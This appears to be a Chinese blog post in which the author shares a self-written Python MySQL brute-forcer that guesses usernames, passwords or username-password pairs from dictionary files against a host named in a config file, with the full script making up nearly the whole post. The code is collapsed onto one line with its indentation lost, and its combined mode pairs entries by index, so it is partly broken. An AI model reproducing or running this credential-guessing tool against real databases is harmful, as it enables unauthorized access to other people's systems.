前言:
今天已经期末考完,睡了个觉起床写了个
mysql爆破器.
思路:
1.爆破用户->用户存在的话不会报错反之报错
2.爆破密码->密码正确不会报错反之报错
3.用户名和密码一起爆破->用户名和密码正确不会报错反之报错
用到的模块:
optparser
pymysql
configparser
os
代码:
import pymysql import optparse import os import configparser def main(): parser=optparse.OptionParser() parser.add_option('-u',dest='username',help='MySQL username of blasting') parser.add_option('-p',dest='password',help='MySQL password of blasting') parser.add_option('-a',action='store_true',dest='all',help='MySQL all of blasting') parser.add_option('-U',dest='zhidinusername',help='Configuration parameters for all: specify user dictionary') parser.add_option('-P',dest='zhidinpassword',help='Configuration parameters for all: specify password dictionary') (options,args)=parser.parse_args() if options.username: file=options.username usernamepo(file) elif options.password: file2=options.password passwordpo(file2) elif options.all and options.zhidinusername and options.zhidinpassword: un=options.zhidinusername pd=options.zhidinpassword allpo(un,pd) else: parser.print_help() exit() def usernamepo(file): cx=open('{}'.format(file),'r') if os.path.exists('config.ini'): print('[+]Config.ini ok') else: print('[-]Config.ini Not Found') exit() print('[*]Read the configuration file information') cf=configparser.ConfigParser() cf.read('config.ini') host=cf.get('config','host') port=cf.get('config','port') password=cf.get('config','password') print('[/]-------Config.ini-------') print('[+]Host:{}'.format(host)) print('[+]Port:{}'.format(port)) print('[+]password{}'.format(password)) print('[/]------User.txt----------') if os.path.exists(file): print('[+]User.txt ok') else: print('[-]User.txt Not Found') print('[/]------Mysql blasting------') for k in cx.readlines(): try: db=pymysql.connect(host,k.strip(),password) print('[+]Mysql Username in {}'.format(k.strip())) except Exception as g: print('[-]Not Username:{},and Error{}'.format(k.strip(),g)) def passwordpo(file2): cx = open('{}'.format(file2), 'r') if os.path.exists('config.ini'): print('[+]Config.ini ok') else: print('[-]Config.ini Not Found') exit() print('[*]Read the configuration file information') cf = configparser.ConfigParser() cf.read('config2.ini') host = cf.get('config', 'host') port = cf.get('config', 'port') username = cf.get('config', 'username') print('[/]-------Config.ini-------') print('[+]Host:{}'.format(host)) print('[+]Port:{}'.format(port)) print('[+]username{}'.format(username)) print('[/]------passwd.txt----------') if os.path.exists(file2): print('[+]Passwd.txt ok') else: print('[-]Passwd.txt Not Found') print('[/]------Mysql blasting------') for k in cx.readlines(): try: db = pymysql.connect(host, username, k.strip()) print('[+]Mysql Password in {}'.format(k.strip())) except Exception as g: print('[-]Not Password:{},and Error{}'.format(k.strip(), g)) def allpo(un,pd): user=open('{}'.format(un),'r') passs=open('{}'.format(pd),'r') usern=[] passn=[] if os.path.exists(un): print('[+]Username.txt is ok') else: print('[-]Not Found username.txt') if os.path.exists(pd): print('[+]Password.txt is ok') else: print('[-]Not Found password.txt') if os.path.exists('config3.ini'): print('[+]Config3.ini ok') else: print('[-]Config3.ini Not Found') exit() cf=configparser.ConfigParser() print('[/---------cofnig3.ini-------]') cf.read('config3.ini') host=cf.get('config','host') print('[+]host:{}'.format(host)) print('[/]------Mysql blasting------') for u in user.readlines(): usern.append(u.strip()) for y in passs.readlines(): passn.append(y.strip()) for g in range(0,len(usern)): try: dk=pymysql.connect(host,usern[g],passn[g]) print('[+]Username:{} and password:{}'.format(usern[g],passn[g])) except Exception as p: print('[-]Not username:{} and password:{} and Error:{}'.format(usern[g],passn[g],p)) if __name__ == '__main__': main()
-u测试:
-p测试:
-a测试:
实际连接: